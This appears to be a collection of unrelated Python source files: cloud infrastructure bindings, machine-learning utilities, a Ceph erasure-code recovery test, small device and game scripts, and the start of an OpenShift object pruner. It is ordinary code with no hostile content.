enabled=True) ``` ## Import ```sh $ pulumi import snowflake:index/apiIntegration:ApiIntegration example name ``` :param str resource_name: The name of the resource. :param ApiIntegrationArgs args: The arguments to use to populate this resource's properties. :param pulumi.ResourceOptions opts: Options for the resource. """ ... def __init__(__self__, resource_name: str, *args, **kwargs): resource_args, opts = _utilities.get_resource_args_opts(ApiIntegrationArgs, pulumi.ResourceOptions, *args, **kwargs) if resource_args is not None: __self__._internal_init(resource_name, opts, **resource_args.__dict__) else: __self__._internal_init(resource_name, *args, **kwargs) def _internal_init(__self__, resource_name: str, opts: Optional[pulumi.ResourceOptions] = None, api_allowed_prefixes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, api_aws_role_arn: Optional[pulumi.Input[str]] = None, api_blocked_prefixes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, api_provider: Optional[pulumi.Input[str]] = None, azure_ad_application_id: Optional[pulumi.Input[str]] = None, azure_tenant_id: Optional[pulumi.Input[str]] = None, enabled: Optional[pulumi.Input[bool]] = None, name: Optional[pulumi.Input[str]] = None, __props__=None): if opts is None: opts = pulumi.ResourceOptions() if not isinstance(opts, pulumi.ResourceOptions): raise TypeError('Expected resource options to be a ResourceOptions instance') if opts.version is None: opts.version = _utilities.get_version() if opts.id is None: if __props__ is not None: raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource') __props__ = ApiIntegrationArgs.__new__(ApiIntegrationArgs) if api_allowed_prefixes is None and not opts.urn: raise TypeError("Missing required property 'api_allowed_prefixes'") __props__.__dict__["api_allowed_prefixes"] = api_allowed_prefixes __props__.__dict__["api_aws_role_arn"] = api_aws_role_arn __props__.__dict__["api_blocked_prefixes"] = api_blocked_prefixes if api_provider is None and not opts.urn: raise TypeError("Missing required property 'api_provider'") __props__.__dict__["api_provider"] = api_provider __props__.__dict__["azure_ad_application_id"] = azure_ad_application_id __props__.__dict__["azure_tenant_id"] = azure_tenant_id __props__.__dict__["enabled"] = enabled __props__.__dict__["name"] = name __props__.__dict__["api_aws_external_id"] = None __props__.__dict__["api_aws_iam_user_arn"] = None __props__.__dict__["azure_consent_url"] = None __props__.__dict__["azure_multi_tenant_app_name"] = None __props__.__dict__["created_on"] = None super(ApiIntegration, __self__).__init__( 'snowflake:index/apiIntegration:ApiIntegration', resource_name, __props__, opts) @staticmethod def get(resource_name: str, id: pulumi.Input[str], opts: Optional[pulumi.ResourceOptions] = None, api_allowed_prefixes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, api_aws_external_id: Optional[pulumi.Input[str]] = None, api_aws_iam_user_arn: Optional[pulumi.Input[str]] = None, api_aws_role_arn: Optional[pulumi.Input[str]] = None, api_blocked_prefixes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, api_provider: Optional[pulumi.Input[str]] = None, azure_ad_application_id: Optional[pulumi.Input[str]] = None, azure_consent_url: Optional[pulumi.Input[str]] = None, azure_multi_tenant_app_name: Optional[pulumi.Input[str]] = None, azure_tenant_id: Optional[pulumi.Input[str]] = None, created_on: Optional[pulumi.Input[str]] = None, enabled: Optional[pulumi.Input[bool]] = None, name: Optional[pulumi.Input[str]] = None) -> 'ApiIntegration': """ Get an existing ApiIntegration resource's state with the given name, id, and optional extra properties used to qualify the lookup. :param str resource_name: The unique name of the resulting resource. :param pulumi.Input[str] id: The unique provider ID of the resource to lookup. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[Sequence[pulumi.Input[str]]] api_allowed_prefixes: Explicitly limits external functions that use the integration to reference one or more HTTPS proxy service endpoints and resources within those proxies. :param pulumi.Input[str] api_aws_external_id: The external ID that Snowflake will use when assuming the AWS role. :param pulumi.Input[str] api_aws_iam_user_arn: The Snowflake user that will attempt to assume the AWS role. :param pulumi.Input[str] api_aws_role_arn: ARN of a cloud platform role. :param pulumi.Input[Sequence[pulumi.Input[str]]] api_blocked_prefixes: Lists the endpoints and resources in the HTTPS proxy service that are not allowed to be called from Snowflake. :param pulumi.Input[str] api_provider: Specifies the HTTPS proxy service type. :param pulumi.Input[str] azure_ad_application_id: The 'Application (client) id' of the Azure AD app for your remote service. :param pulumi.Input[str] azure_tenant_id: Specifies the ID for your Office 365 tenant that all Azure API Management instances belong to. :param pulumi.Input[str] created_on: Date and time when the API integration was created. :param pulumi.Input[bool] enabled: Specifies whether this API integration is enabled or disabled. If the API integration is disabled, any external function that relies on it will not work. :param pulumi.Input[str] name: Specifies the name of the API integration. This name follows the rules for Object Identifiers. The name should be unique among api integrations in your account. """ opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id)) __props__ = _ApiIntegrationState.__new__(_ApiIntegrationState) __props__.__dict__["api_allowed_prefixes"] = api_allowed_prefixes __props__.__dict__["api_aws_external_id"] = api_aws_external_id __props__.__dict__["api_aws_iam_user_arn"] = api_aws_iam_user_arn __props__.__dict__["api_aws_role_arn"] = api_aws_role_arn __props__.__dict__["api_blocked_prefixes"] = api_blocked_prefixes __props__.__dict__["api_provider"] = api_provider __props__.__dict__["azure_ad_application_id"] = azure_ad_application_id __props__.__dict__["azure_consent_url"] = azure_consent_url __props__.__dict__["azure_multi_tenant_app_name"] = azure_multi_tenant_app_name __props__.__dict__["azure_tenant_id"] = azure_tenant_id __props__.__dict__["created_on"] = created_on __props__.__dict__["enabled"] = enabled __props__.__dict__["name"] = name return ApiIntegration(resource_name, opts=opts, __props__=__props__) @property @pulumi.getter(name="apiAllowedPrefixes") def api_allowed_prefixes(self) -> pulumi.Output[Sequence[str]]: """ Explicitly limits external functions that use the integration to reference one or more HTTPS proxy service endpoints and resources within those proxies. """ return pulumi.get(self, "api_allowed_prefixes") @property @pulumi.getter(name="apiAwsExternalId") def api_aws_external_id(self) -> pulumi.Output[str]: """ The external ID that Snowflake will use when assuming the AWS role. """ return pulumi.get(self, "api_aws_external_id") @property @pulumi.getter(name="apiAwsIamUserArn") def api_aws_iam_user_arn(self) -> pulumi.Output[str]: """ The Snowflake user that will attempt to assume the AWS role. """ return pulumi.get(self, "api_aws_iam_user_arn") @property @pulumi.getter(name="apiAwsRoleArn") def api_aws_role_arn(self) -> pulumi.Output[Optional[str]]: """ ARN of a cloud platform role. """ return pulumi.get(self, "api_aws_role_arn") @property @pulumi.getter(name="apiBlockedPrefixes") def api_blocked_prefixes(self) -> pulumi.Output[Optional[Sequence[str]]]: """ Lists the endpoints and resources in the HTTPS proxy service that are not allowed to be called from Snowflake. """ return pulumi.get(self, "api_blocked_prefixes") @property @pulumi.getter(name="apiProvider") def api_provider(self) -> pulumi.Output[str]: """ Specifies the HTTPS proxy service type. """ return pulumi.get(self, "api_provider") @property @pulumi.getter(name="azureAdApplicationId") def azure_ad_application_id(self) -> pulumi.Output[Optional[str]]: """ The 'Application (client) id' of the Azure AD app for your remote service. """ return pulumi.get(self, "azure_ad_application_id") @property @pulumi.getter(name="azureConsentUrl") def azure_consent_url(self) -> pulumi.Output[str]: return pulumi.get(self, "azure_consent_url") @property @pulumi.getter(name="azureMultiTenantAppName") def azure_multi_tenant_app_name(self) -> pulumi.Output[str]: return pulumi.get(self, "azure_multi_tenant_app_name") @property @pulumi.getter(name="azureTenantId") def azure_tenant_id(self) -> pulumi.Output[Optional[str]]: """ Specifies the ID for your Office 365 tenant that all Azure API Management instances belong to. """ return pulumi.get(self, "azure_tenant_id") @property @pulumi.getter(name="createdOn") def created_on(self) -> pulumi.Output[str]: """ Date and time when the API integration was created. """ return pulumi.get(self, "created_on") @property @pulumi.getter def enabled(self) -> pulumi.Output[Optional[bool]]: """ Specifies whether this API integration is enabled or disabled. If the API integration is disabled, any external function that relies on it will not work. """ return pulumi.get(self, "enabled") @property @pulumi.getter def name(self) -> pulumi.Output[str]: """ Specifies the name of the API integration. This name follows the rules for Object Identifiers. The name should be unique among api integrations in your account. """ return pulumi.get(self, "name")
python
from typing import Tuple import jax import jax.numpy as jnp from jaxrl.datasets import Batch from jaxrl.networks.common import InfoDict, Model, Params, PRNGKey def target_update(critic: Model, target_critic: Model, tau: float) -> Model: new_target_params = jax.tree_multimap( lambda p, tp: p * tau + tp * (1 - tau), critic.params, target_critic.params) return target_critic.replace(params=new_target_params) def update(key: PRNGKey, actor: Model, critic: Model, target_critic: Model, temp: Model, batch: Batch, discount: float, soft_critic: bool) -> Tuple[Model, InfoDict]: dist = actor(batch.next_observations) next_actions = dist.sample(seed=key) next_log_probs = dist.log_prob(next_actions) next_q1, next_q2 = target_critic(batch.next_observations, next_actions) next_q = jnp.minimum(next_q1, next_q2) target_q = batch.rewards + discount * batch.masks * next_q if soft_critic: target_q -= discount * batch.masks * temp() * next_log_probs def critic_loss_fn(critic_params: Params) -> Tuple[jnp.ndarray, InfoDict]: q1, q2 = critic.apply({'params': critic_params}, batch.observations, batch.actions) critic_loss = ((q1 - target_q)**2 + (q2 - target_q)**2).mean() return critic_loss, { 'critic_loss': critic_loss, 'q1': q1.mean(), 'q2': q2.mean() } new_critic, info = critic.apply_gradient(critic_loss_fn) return new_critic, info
python
import os import pytest import flask from flask_dance.contrib.github import make_github_blueprint, github from flask_dance.consumer.storage import MemoryStorage betamax = pytest.importorskip("betamax") GITHUB_ACCESS_TOKEN = os.environ.get("GITHUB_OAUTH_ACCESS_TOKEN", "fake-token") current_dir = os.path.dirname(__file__) with betamax.Betamax.configure() as config: config.cassette_library_dir = os.path.join(current_dir, "cassettes") config.define_cassette_placeholder("<AUTH_TOKEN>", GITHUB_ACCESS_TOKEN) @pytest.fixture def app(): _app = flask.Flask(__name__) _app.secret_key = "secret" github_bp = make_github_blueprint( storage=MemoryStorage({"access_token": GITHUB_ACCESS_TOKEN}) ) _app.register_blueprint(github_bp, url_prefix="/login") @_app.route("/") def index(): if not github.authorized: return redirect(url_for("github.login")) resp = github.get("/user") assert resp.ok return "You are @{login} on GitHub".format(login=resp.json()["login"]) return _app @pytest.fixture def flask_dance_sessions(): return github @pytest.mark.usefixtures("betamax_record_flask_dance") def test_home_page(app): with app.test_client() as client: response = client.get("/", base_url="https://example.com") assert response.status_code == 200 text = response.get_data(as_text=True) assert text == "You are @singingwolfboy on GitHub"
python
import numpy as np import scipy as sp import scipy.stats def gaussian_loglik(obs, mu, sigma): return sp.stats.multivariate_normal.logpdf(obs, mean=mu, cov=sigma) / mu.shape[0] def gaussian_entropy(sigma): return 0.5 * (len(sigma) + np.log(np.linalg.det(sigma)) + np.log(2 * np.pi)) def r2_score(obs, pred): return 1 - np.sum((obs - pred) ** 2) / np.sum((obs - np.mean(obs)) ** 2) def cal_error(obs, mu, sigma, bins=5): """ Unweighted regression calibration error for GP predictions. We calculate the mean-squared error between predicted versus observed empirical CDFs, for the specified number of equally spaced bins on the interval [0,1]. [Equation (9), Kuleshov et. al. 2018] Parameters ---------- obs: m-length array of observations mu: m-length array of predicted means sigma: m x m array of predicted covariance bins: number of bins at which to evaluate Returns ------- cal_error: float predicted: predicted CDFs corresponding to each bin empirical: observed CDFs corresponding to each bin """ sigmas = np.diag(sigma) quantiles = sp.stats.norm.cdf(obs, mu, np.sqrt(sigmas)) predicted = np.arange(1/bins, 1+1/bins, 1/bins) empirical = np.array([np.mean(quantiles < p) for p in predicted]) return np.sum((predicted - empirical) ** 2) / bins, predicted, empirical
python
from pydantic import BaseSettings class Settings(BaseSettings): APP_NAME: str = "FastAPI Boilerplate" EMAIL_SENDER: str = "[email protected]" SMTP_SERVER: str = "your_stmp_server_here" POSTGRES_USER: str = "app" POSTGRES_PASSWORD: str = "app" POSTGRES_SERVER: str = "db" POSTGRES_DB: str = "app" settings = Settings()
python
import json import logging import random import time import traceback from ceph.rados_utils import RadosHelper log = logging.getLogger(__name__) def run(ceph_cluster, **kw): """ CEPH-9311 - RADOS: Pyramid erasure codes (Local Repai rable erasure codes): Bring down 2 osds (in case of k=4) from 2 localities so that recovery happens from local repair code 1. Create a LRC profile and then create a ec pool #ceph osd erasure-code-profile set $profile \ plugin=lrc \ k=4 m=2 l=3 \ ruleset-failure-domain=osd # ceph osd pool create $poolname 1 1 erasure $profile 2. start writing objects to the pool # rados -p poolname bench 1000 write --no-cleanup 3. Bring down 2 osds from 2 different localities which contains data chunk:(for this we need to figure out mapping) for ex: with k=4, m=2, l=3 mapping looks like chunk nr 01234567 step 1 _cDD_cDD (Here DD are data chunks ) step 2 cDDD____ step 3 ____cDDD from "step 1" in the above mapping we can see that data chunk is divided into 2 localities which is anlogous to 2 data center. so in our case for ex we have to bring down (3,7) OR (2,7) OR (2,6) OR (3,6) . Args: ceph_cluster (ceph.ceph.Ceph): ceph cluster """ log.info("Running test ceph-9311") ceph_nodes = kw.get("ceph_nodes") config = kw.get("config") build = config.get("build", config.get("rhbuild")) mons = [] role = "client" for mnode in ceph_nodes: if mnode.role == role: mons.append(mnode) ctrlr = mons[0] log.info("chosing mon {cmon} as ctrlrmon".format(cmon=ctrlr.hostname)) helper = RadosHelper(ctrlr, config, log) """Create an LRC profile""" sufix = random.randint(0, 10000) prof_name = "LRCprofile{suf}".format(suf=sufix) if build.startswith("4"): profile = "osd erasure-code-profile set {LRCprofile} plugin=lrc k=4 m=2 l=3 \ crush-failure-domain=osd".format( LRCprofile=prof_name ) else: profile = "osd erasure-code-profile set {LRCprofile} plugin=lrc k=4 m=2 l=3 \ ruleset-failure-domain=osd crush-failure-domain=osd".format( LRCprofile=prof_name ) try: (out, err) = helper.raw_cluster_cmd(profile) outbuf = out.read().decode() log.info(outbuf) log.info("created profile {LRCprofile}".format(LRCprofile=prof_name)) except Exception: log.error("LRC profile creation failed") log.error(traceback.format_exc()) return 1 """create LRC ec pool""" pool_name = "lrcpool{suf}".format(suf=sufix) try: helper.create_pool(pool_name, 1, prof_name) log.info("Pool {pname} created".format(pname=pool_name)) except Exception: log.error("lrcpool create failed") log.error(traceback.format_exc()) return 1 """ Bringdown 2 osds which contains a 'D' from both localities we will be chosing osd at 2 and 7 from the given active set list """ oname = "UNIQUEOBJECT{i}".format(i=random.randint(0, 10000)) cmd = "osd map {pname} {obj} --format json".format(pname=pool_name, obj=oname) (out, err) = helper.raw_cluster_cmd(cmd) outbuf = out.read().decode() log.info(outbuf) cmdout = json.loads(outbuf) # targt_pg = cmdout['pgid'] target_osds_ids = [] for i in [2, 7]: target_osds_ids.append(cmdout["up"][i]) # putobj = "sudo rados -p {pool} put {obj} {path}".format( # pool=pool_name, obj=oname, path="/etc/hosts" # ) for i in range(10): putobj = "sudo rados -p {pool} put {obj} {path}".format( pool=pool_name, obj="{oname}{i}".format(oname=oname, i=i), path="/etc/hosts" ) (out, err) = ctrlr.exec_command(cmd=putobj) """Bringdown tosds""" osd_service_map_list = [] for osd_id in target_osds_ids: target_osd_hostname = ceph_cluster.get_osd_metadata(osd_id).get("hostname") target_osd_node = ceph_cluster.get_node_by_hostname(target_osd_hostname) osd_service = ceph_cluster.get_osd_service_name(osd_id) osd_service_map_list.append( {"osd_node": target_osd_node, "osd_service": osd_service} ) helper.kill_osd(target_osd_node, osd_service) time.sleep(5) outbuf = "degrade" timeout = 10 found = 0 status = "-s --format json" while timeout: if "active" not in outbuf: (out, err) = helper.raw_cluster_cmd(status) outbuf = out.read().decode() time.sleep(1) timeout = timeout - 1 else: found = 1 break if timeout == 0 and found == 0: log.error("cluster didn't become active+clean..timeout") return 1 """check whether read/write can be done on the pool""" for i in range(10): putobj = "sudo rados -p {pool} put {obj} {path}".format( pool=pool_name, obj="{oname}{i}".format(oname=oname, i=i), path="/etc/hosts" ) (out, err) = ctrlr.exec_command(cmd=putobj) log.info(out.read().decode()) for i in range(10): putobj = "sudo rados -p {pool} get {obj} {path}".format( pool=pool_name, obj="{oname}{i}".format(oname=oname, i=i), path="/tmp/{obj}{i}".format(obj=oname, i=i), ) (out, err) = ctrlr.exec_command(cmd=putobj) log.info(out.read().decode()) """donewith the test ,revive osds""" for osd_service_map in osd_service_map_list: helper.revive_osd( osd_service_map.get("osd_node"), osd_service_map.get("osd_service") ) return 0
python
import numpy as np import cv2 import re import torch import torch.nn as nn from torchvision import transforms from marsh_plant_dataset import MarshPlant_Dataset N_CLASSES = 7 output_columns = ['Row', 'Img_ID', 'Section', 'Sarcocornia', 'Spartina', 'Limonium', 'Borrichia', 'Batis', 'Juncus', 'None'] THRESHOLD_SIG = 0.5 batch_size = 32 bShuffle = False num_workers = 8 image_dim = (512, 512) id_regex = re.compile('.*Row(\d+).*DSC_(\d+)_(\d+)') remove_brackets = re.compile('\[(.*)\]') model_path = './modeling/saved_models/resnext_pa_sig_0.50_2011susie.torch' data_infile = ['./infiles/2011_Rows1to25_pred_test_infile.txt'] outfile = '2011_Rows1to25_predictions_newformat.txt' model = torch.load(model_path) model.eval() sigfunc = nn.Sigmoid() transforms_base = transforms.Compose([ transforms.Resize(image_dim), transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]) ]) pred_data = MarshPlant_Dataset(data_infile, train=False, transform = transforms_base) data_loader = torch.utils.data.DataLoader(pred_data, batch_size=batch_size, shuffle = bShuffle, num_workers=num_workers) cpu = torch.device("cpu") gpu = torch.device("cuda") results = {'Row': [], 'img': [], 'sector': [], 'pred': np.empty((0, N_CLASSES), int) } with torch.no_grad(): for it, batch in enumerate(data_loader): output = model(batch['X'].to(gpu)).to(cpu) sig = sigfunc(output) sig = sig.detach().numpy() this_pred = sig > THRESHOLD_SIG results['pred'] = np.append(results['pred'], this_pred.astype(int), axis = 0) for file in batch['fname']: m = id_regex.search(file) if(m): #print('Row: {}, img {}, sector {}'.format(m.group(1), m.group(2), m.group(3) ) ) results['Row'].append(m.group(1)) results['img'].append(m.group(2)) results['sector'].append(m.group(3)) else: results['Row'].append('x') results['img'].append('x') results['sector'].append('x') fout = open(outfile, 'w') header = '\t'.join(output_columns) + '\n' fout.write(header) for i in range(len(results['Row'])): fout.write('{}\t{}\t{}\t'.format(results['Row'][i], results['img'][i], results['sector'][i] ) ) str_out = np.array2string(results['pred'][i, :]) m = remove_brackets.match(str_out) str_out = m[1] fout.write('%s\t' % str_out) fout.write('\n')
python
from glob import glob from config import BOARD_HEIGHT, BOARD_WIDTH, N_IN_ROW from utils import get_model_path from config import globalV from game import Board, Game from mcts_alphaZero import MCTSPlayer from policy_value_net_pytorch import PolicyValueNet """ input location as '3,3' to play """ class Human: """ human player """ def __init__(self): self.player = None def set_player_ind(self, p): self.player = p def get_action(self, board): try: location = input("Your move: ") if isinstance(location, str): location = [int(n, 10) for n in location.split(",")] move = board.location_to_move(location) except Exception as e: move = -1 if move == -1 or move not in board.available: print("invalid move") move = self.get_action(board) return move def __str__(self): return "Human {}".format(self.player) def run(model_name): n = N_IN_ROW width, height = BOARD_WIDTH, BOARD_HEIGHT globalV['MODEL_NAME'] = model_name globalV['MODEL_PATH'] = get_model_path(model_name) try: board = Board(width=width, height=height, n_in_row=n) game = Game(board) # 创建 AI player best_policy = PolicyValueNet(width, height, model_file=globalV['MODEL_PATH']) mcts_player = MCTSPlayer(best_policy.policy_value_fn, c_puct=5, n_playout=400) # 创建 Human player ,输入样例: 2,3 human = Human() # 设置 start_player = 0 可以让人类先手 game.start_play(human, mcts_player, start_player=1, is_shown=1) except KeyboardInterrupt: print('\n\rquit')
python
import json import urllib2 import uuid import random import string # send api call, must have NXT server running def nxtapi(typ): return json.load(urllib2.urlopen('http://jnxt.org:7876/nxt', typ));
python
# ************************************************ # (c) 2019-2021 Nurul-GC. * # - BSD 3-Clause License * # ************************************************ from secrets import token_bytes from typing import Tuple def encrypt(text: str) -> Tuple[int, int]: """Function that encrypts the text given into numbers. :param text: the text to be encrypted :return: tuple with two tokens of numbers""" encoded = text.encode() enbyted = token_bytes(len(text)) num_encoded = int.from_bytes(encoded, 'big') num_enbyted = int.from_bytes(enbyted, 'big') encrypted = num_encoded ^ num_enbyted return encrypted, num_enbyted
python
# coding=utf-8 # *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. *** # *** Do not edit by hand unless you're certain you know what you are doing! *** import warnings import pulumi import pulumi.runtime from typing import Any, Mapping, Optional, Sequence, Union, overload from .. import _utilities __all__ = [ 'MembersMemberArgs', 'PoolPersistenceArgs', ] @pulumi.input_type class MembersMemberArgs: def __init__(__self__, *, address: pulumi.Input[str], protocol_port: pulumi.Input[int], admin_state_up: Optional[pulumi.Input[bool]] = None, backup: Optional[pulumi.Input[bool]] = None, id: Optional[pulumi.Input[str]] = None, name: Optional[pulumi.Input[str]] = None, subnet_id: Optional[pulumi.Input[str]] = None, weight: Optional[pulumi.Input[int]] = None): """ :param pulumi.Input[str] address: The IP address of the members to receive traffic from the load balancer. :param pulumi.Input[int] protocol_port: The port on which to listen for client traffic. :param pulumi.Input[bool] admin_state_up: The administrative state of the member. A valid value is true (UP) or false (DOWN). Defaults to true. :param pulumi.Input[bool] backup: A bool that indicates whether the the member is backup. **Requires octavia minor version 2.1 or later**. :param pulumi.Input[str] id: The unique ID for the members. :param pulumi.Input[str] name: Human-readable name for the member. :param pulumi.Input[str] subnet_id: The subnet in which to access the member. :param pulumi.Input[int] weight: A positive integer value that indicates the relative portion of traffic that this members should receive from the pool. For example, a member with a weight of 10 receives five times as much traffic as a member with a weight of 2. Defaults to 1. """ pulumi.set(__self__, "address", address) pulumi.set(__self__, "protocol_port", protocol_port) if admin_state_up is not None: pulumi.set(__self__, "admin_state_up", admin_state_up) if backup is not None: pulumi.set(__self__, "backup", backup) if id is not None: pulumi.set(__self__, "id", id) if name is not None: pulumi.set(__self__, "name", name) if subnet_id is not None: pulumi.set(__self__, "subnet_id", subnet_id) if weight is not None: pulumi.set(__self__, "weight", weight) @property @pulumi.getter def address(self) -> pulumi.Input[str]: """ The IP address of the members to receive traffic from the load balancer. """ return pulumi.get(self, "address") @address.setter def address(self, value: pulumi.Input[str]): pulumi.set(self, "address", value) @property @pulumi.getter(name="protocolPort") def protocol_port(self) -> pulumi.Input[int]: """ The port on which to listen for client traffic. """ return pulumi.get(self, "protocol_port") @protocol_port.setter def protocol_port(self, value: pulumi.Input[int]): pulumi.set(self, "protocol_port", value) @property @pulumi.getter(name="adminStateUp") def admin_state_up(self) -> Optional[pulumi.Input[bool]]: """ The administrative state of the member. A valid value is true (UP) or false (DOWN). Defaults to true. """ return pulumi.get(self, "admin_state_up") @admin_state_up.setter def admin_state_up(self, value: Optional[pulumi.Input[bool]]): pulumi.set(self, "admin_state_up", value) @property @pulumi.getter def backup(self) -> Optional[pulumi.Input[bool]]: """ A bool that indicates whether the the member is backup. **Requires octavia minor version 2.1 or later**. """ return pulumi.get(self, "backup") @backup.setter def backup(self, value: Optional[pulumi.Input[bool]]): pulumi.set(self, "backup", value) @property @pulumi.getter def id(self) -> Optional[pulumi.Input[str]]: """ The unique ID for the members. """ return pulumi.get(self, "id") @id.setter def id(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "id", value) @property @pulumi.getter def name(self) -> Optional[pulumi.Input[str]]: """ Human-readable name for the member. """ return pulumi.get(self, "name") @name.setter def name(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "name", value) @property @pulumi.getter(name="subnetId") def subnet_id(self) -> Optional[pulumi.Input[str]]: """ The subnet in which to access the member. """ return pulumi.get(self, "subnet_id") @subnet_id.setter def subnet_id(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "subnet_id", value) @property @pulumi.getter def weight(self) -> Optional[pulumi.Input[int]]: """ A positive integer value that indicates the relative portion of traffic that this members should receive from the pool. For example, a member with a weight of 10 receives five times as much traffic as a member with a weight of 2. Defaults to 1. """ return pulumi.get(self, "weight") @weight.setter def weight(self, value: Optional[pulumi.Input[int]]): pulumi.set(self, "weight", value) @pulumi.input_type class PoolPersistenceArgs: def __init__(__self__, *, type: pulumi.Input[str], cookie_name: Optional[pulumi.Input[str]] = None): """ :param pulumi.Input[str] type: The type of persistence mode. The current specification supports SOURCE_IP, HTTP_COOKIE, and APP_COOKIE. :param pulumi.Input[str] cookie_name: The name of the cookie if persistence mode is set appropriately. Required if `type = APP_COOKIE`. """ pulumi.set(__self__, "type", type) if cookie_name is not None: pulumi.set(__self__, "cookie_name", cookie_name) @property @pulumi.getter def type(self) -> pulumi.Input[str]: """ The type of persistence mode. The current specification supports SOURCE_IP, HTTP_COOKIE, and APP_COOKIE. """ return pulumi.get(self, "type") @type.setter def type(self, value: pulumi.Input[str]): pulumi.set(self, "type", value) @property @pulumi.getter(name="cookieName") def cookie_name(self) -> Optional[pulumi.Input[str]]: """ The name of the cookie if persistence mode is set appropriately. Required if `type = APP_COOKIE`. """ return pulumi.get(self, "cookie_name") @cookie_name.setter def cookie_name(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "cookie_name", value)
python
import mipow bulb = mipow.mipow("70:44:4B:14:AC:E6") bulb.connect() bulb.off() bulb.disconnect()
python
# coding=utf-8 # -------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for license information. # Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is regenerated. # -------------------------------------------------------------------------- from enum import Enum, EnumMeta from six import with_metaclass class _CaseInsensitiveEnumMeta(EnumMeta): def __getitem__(self, name): return super().__getitem__(name.upper()) def __getattr__(cls, name): """Return the enum member matching `name` We use __getattr__ instead of descriptors or inserting into the enum class' __dict__ in order to support `name` and `value` being both properties for enum members (which live in the class' __dict__) and enum members themselves. """ try: return cls._member_map_[name.upper()] except KeyError: raise AttributeError(name) class DeploymentState(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)): """Deployment state. """ #: The deployment can be sent to devices targeted in the deployment. ACTIVE = "Active" #: A newer deployment with the same targeting exists and no devices will receive this deployment. SUPERSEDED = "Superseded" #: The deployment has been canceled and no devices will receive it. CANCELED = "Canceled" class DeploymentType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)): """Supported deployment types. """ #: A complete deployment including download, install, and apply actions. COMPLETE = "Complete" #: A download-only deployment that does not include any install or apply actions. Not currently #: supported. DOWNLOAD = "Download" #: An install-only rollout that does not include any download actions, only install and complete. #: Not currently supported. INSTALL = "Install" class DeviceDeploymentState(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)): """Deployment state. """ #: Deployment has completed with success. SUCCEEDED = "Succeeded" #: Deployment is in progress. IN_PROGRESS = "InProgress" #: Deployment has completed with failure. FAILED = "Failed" #: Deployment was canceled. CANCELED = "Canceled" #: Deployment is not compatible with the device. INCOMPATIBLE = "Incompatible" class DeviceGroupType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)): """Supported deployment group types. """ #: The deployment should be sent to all devices in the device class. ALL = "All" #: The deployment should be sent to the list of devices in the device group definition. DEVICES = "Devices" #: The deployment should be sent to the list of devices returned by the union of all the device #: group definition queries. DEVICE_GROUP_DEFINITIONS = "DeviceGroupDefinitions" class DeviceState(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)): """The deployment device state. """ #: Not started (or uninitialized). NOT_STARTED = "NotStarted" #: Deployment incompatible for this device. INCOMPATIBLE = "Incompatible" #: Another Deployment is underway for this device. ALREADY_IN_DEPLOYMENT = "AlreadyInDeployment" #: Deployment has been canceled for this device. CANCELED = "Canceled" #: Deployment underway. IN_PROGRESS = "InProgress" #: Deployment failed. FAILED = "Failed" #: Deployment completed successfully. SUCCEEDED = "Succeeded" class GroupType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)): """Supported group types. """ #: IoT Hub tag based group. IO_T_HUB_TAG = "IoTHubTag" class OperationFilterStatus(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)): """Operation status filter. """ RUNNING = "Running" NOT_STARTED = "NotStarted" class OperationStatus(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)): """Operation status. """ #: Undefined operation status. UNDEFINED = "Undefined" #: Background operation created but not started yet. NOT_STARTED = "NotStarted" #: Background operation is currently running. RUNNING = "Running" #: Background operation finished with success. SUCCEEDED = "Succeeded" #: Background operation finished with failure. FAILED = "Failed"
python
#!/usr/bin/env python # vim: expandtab:tabstop=4:shiftwidth=4 ''' Prune images/builds/deployments ''' # # Copyright 2016 Red Hat Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # Disabling invalid-name because pylint doesn't like the naming # convention we have. # pylint: disable=invalid-name import argparse import base64 import json import os import subprocess SERVICE_ACCOUNT_GROUP = "openshift-infra" SERVICE_ACCOUNT = "autopruner" SERVICE_ACCOUNT_TEMPLATE = {"apiVersion": "v1", "kind": "ServiceAccount", "metadata": {"name": SERVICE_ACCOUNT} } class OpenShiftPrune(object): ''' Class to handle pruning of old objects ''' def __init__(self): self.args = None self.parse_args() def parse_args(self): '''Parse the arguments for this script''' parser = argparse.ArgumentParser(description="OpenShift object pruner") parser.add_argument('-d', '--debug', default=False, action="store_true", help="debug mode") parser.add_argument('--image-keep-younger-than', default='24h', help='Ignore images younger than set time') parser.add_argument('--image-keep-tag-revisions', default='5', help='Number of image revisions to keep') parser.add_argument('--build-keep-younger-than', default='1h', help='Ignore builds younger than set time') parser.add_argument('--build-keep-complete', default='2', help='Number of builds to keep') parser.add_argument('--build-keep-failed', default='1', help='Number of failed builds to keep') parser.add_argument('--deploy-keep-younger-than', default='1h', help='Ignore deployments younger than set time') parser.add_argument('--deploy-keep-complete', default='2', help='Number of deployements to keep') parser.add_argument('--deploy-keep-failed', default='1', help='Number of failed deployments to keep') parser.add_argument('--kube-config', 